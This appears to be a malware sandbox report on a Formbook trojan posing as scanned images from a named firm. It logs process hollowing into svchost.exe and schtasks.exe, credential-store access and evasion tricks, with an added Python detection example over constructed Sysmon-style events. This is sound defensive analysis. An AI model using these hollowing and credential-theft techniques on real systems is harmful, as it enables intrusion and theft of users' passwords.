            Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8A2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A78713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A78CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A9F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A986D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A24FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | File created: C:\Users\user\AppData\Local\Temp\autB42C.tmp
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002965000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.0000000002971000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1805384026.0000000002965000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.0000000002995000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | ReversingLabs: Detection: 76%
            Source: unknown | Process created: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Section loaded: rasadhlp.dll
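The process tree above (a SysWOW64 svchost.exe launched with the sample's own command line, schtasks.exe started from a randomly named directory under Program Files (x86), and that schtasks.exe in turn launching firefox.exe) and the modules the injected schtasks.exe loads (winsqlite3.dll, vaultcli.dll and dpapi.dll alongside a Chromium "password_notes" schema in its memory and a read of the Outlook profile key) are the observables a detection engineer would turn into rules. The following is an added example, not part of the Joe Sandbox report and not any vendor's rule set: it runs that detection logic over constructed, Sysmon-style process-creation and image-load records that mirror those rows. The record fields, pids, the browser/mail allowlist, the injection-host watchlist and the 24-character directory-name threshold are assumptions made for the example.

```python
# Added example (not from the Joe Sandbox report): detection rules over a
# constructed telemetry stream modelled on the report's process tree and on the
# DLLs the injected schtasks.exe loads. Field names follow Sysmon ProcessCreate /
# ImageLoad conventions; records, allowlists and thresholds are assumptions.
import ntpath
from collections import defaultdict

SAMPLE = r"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
DECOY = (r"C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI"
         r"\XraVxjqYYo.exe")
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

# Constructed events: pids are arbitrary, the three malicious rows mirror the report.
EVENTS = [
    {"type": "ProcessCreate", "pid": 2, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": f'"{SAMPLE}"', "parent": SAMPLE},
    {"type": "ProcessCreate", "pid": 9, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}"', "parent": DECOY},
    {"type": "ProcessCreate", "pid": 12, "image": FIREFOX,
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "parent": SCHTASKS},
    # benign control: a real service host started by services.exe
    {"type": "ProcessCreate", "pid": 800, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "parent": r"C:\Windows\System32\services.exe"},
]
EVENTS += [{"type": "ImageLoad", "pid": 9, "image": SCHTASKS, "module": m}
           for m in ("wininet.dll", "winsqlite3.dll", "vaultcli.dll", "dpapi.dll")]
# benign control (constructed): a browser touching its own credential store
EVENTS += [{"type": "ImageLoad", "pid": 4000, "module": m,
            "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"}
           for m in ("winsqlite3.dll", "vaultcli.dll", "dpapi.dll")]

BROWSERS_AND_MAIL = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe",
                     "outlook.exe", "thunderbird.exe"}            # assumed allowlist
INJECTION_HOSTS = {"svchost.exe", "schtasks.exe", "explorer.exe",
                   "cmd.exe", "wuauclt.exe"}                       # assumed watchlist
CREDENTIAL_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}  # loads seen in the report


def base(path):
    """Lower-cased file name of a Windows path (ntpath works off-Windows too)."""
    return ntpath.basename(path).lower()


def argv0(cmdline):
    """First token of a Windows command line, honouring a quoted program path."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def randomized_program_files_dir(path, min_len=24):
    """True for C:\\Program Files*\\<one long, purely alphabetic directory>\\file."""
    parts = path.split("\\")
    if len(parts) >= 4 and parts[1].lower() in ("program files", "program files (x86)"):
        return len(parts[2]) >= min_len and parts[2].isalpha()
    return False


def analyze(events):
    """Return (rule_name, pid) findings for ProcessCreate / ImageLoad events."""
    findings = []
    loaded = defaultdict(set)  # (pid, image name) -> modules loaded so far
    for e in events:
        img = base(e["image"])
        if e["type"] == "ProcessCreate":
            parent = base(e["parent"])
            # Hollowing tell: the on-disk image is a system binary but the
            # command line still names the original sample.
            if img != base(argv0(e["cmdline"])):
                findings.append(("image_cmdline_mismatch", e["pid"]))
            if img == "svchost.exe" and parent != "services.exe":
                findings.append(("svchost_unexpected_parent", e["pid"]))
            if parent in INJECTION_HOSTS and img in BROWSERS_AND_MAIL:
                findings.append(("system_binary_spawns_browser", e["pid"]))
            if randomized_program_files_dir(e["image"]) or randomized_program_files_dir(e["parent"]):
                findings.append(("randomized_program_files_dir", e["pid"]))
        elif e["type"] == "ImageLoad":
            loaded[(e["pid"], img)].add(e["module"].lower())
    for (pid, img), mods in loaded.items():
        # SQLite + Credential Vault + DPAPI together in a process that is neither
        # a browser nor a mail client is the credential-theft module set.
        if CREDENTIAL_DLLS <= mods and img not in BROWSERS_AND_MAIL:
            findings.append(("credential_store_dlls_in_non_browser", pid))
    return findings


if __name__ == "__main__":
    for rule, pid in analyze(EVENTS):
        print(f"{rule:40s} pid={pid}")
```

Run directly, it prints one line per finding; the two benign controls (services.exe starting System32\svchost.exe, a browser loading the same three DLLs) produce nothing, which is what the parent check and the allowlist are for. The image/command-line mismatch is the cheapest of these rules to deploy and is the one that catches the first hop, before any credential DLL is loaded.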
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static file information: File size 1211904 > 1048576
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XraVxjqYYo.exe, 00000008.00000000.1545991574.000000000046E000.00000002.00000001.01000000.00000005.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3798030876.000000000046E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A9C304 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A48B85 push ecx; ret 0_2_00A48B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02132210 push ecx; iretd 2_2_0213222E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0213E2B4 push ss; ret 2_2_0213E2C5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0213E36A push edx; iretd 2_2_0213E372
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212209E push esp; ret 2_2_021220A4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021250AF push 660EA6FEh; ret 2_2_021250B4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021321DC push ebp; retf 2_2_021321F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021321DC push ecx; iretd 2_2_0213222E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021219E0 push esp; ret 2_2_02121A04
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02123660 push eax; ret 2_2_02123662
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021276F8 push edi; retf 2_2_0212771F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212D48B pushfd ; ret 2_2_0212D48F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02139D8E push ss; ret 2_2_02139D8F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0213A5AB push ss; retf 2_2_0213A645
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0213E5F3 push D1A60662h; ret 2_2_0213E5F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021345F7 push eax; iretd 2_2_02134687
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D0225F pushad ; ret 2_2_02D027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D027FA pushad ; ret 2_2_02D027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D0283D push eax; iretd 2_2_02D02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D309AD push ecx; mov dword ptr [esp], ecx 2_2_02D309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D01368 push eax; iretd 2_2_02D01369
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_0323C39F push 195B6DB7h; iretd 8_2_0323C3A6
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_0323CA09 pushfd ; retf 8_2_0323CA0D
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03220A77 push edi; retf 8_2_03220A8C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03233918 push ss; retf 8_2_032339B2
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03237960 push D1A60662h; ret 8_2_03237965
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_032380B1 push FFFFFFFDh; ret 8_2_032380B4
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_032330FB push ss; ret 8_2_032330FC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_032267F8 pushfd ; ret 8_2_032267FC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03237621 push ss; ret 8_2_03237632
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_032376D7 push edx; iretd 8_2_032376DF
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | File created: \scanned-imgs_from bumi wangsa tms sdn bhd..exe

            Boot Survival

            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A24A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00A24A35
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00AA55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00AA55FD
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A433C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00A433C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | API/Special instruction interceptor: Address: 1693224
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D7096E rdtsc 2_2_02D7096E
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 3013
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 6959
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Evaded block: after key decision | graph_0-99610
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-100753
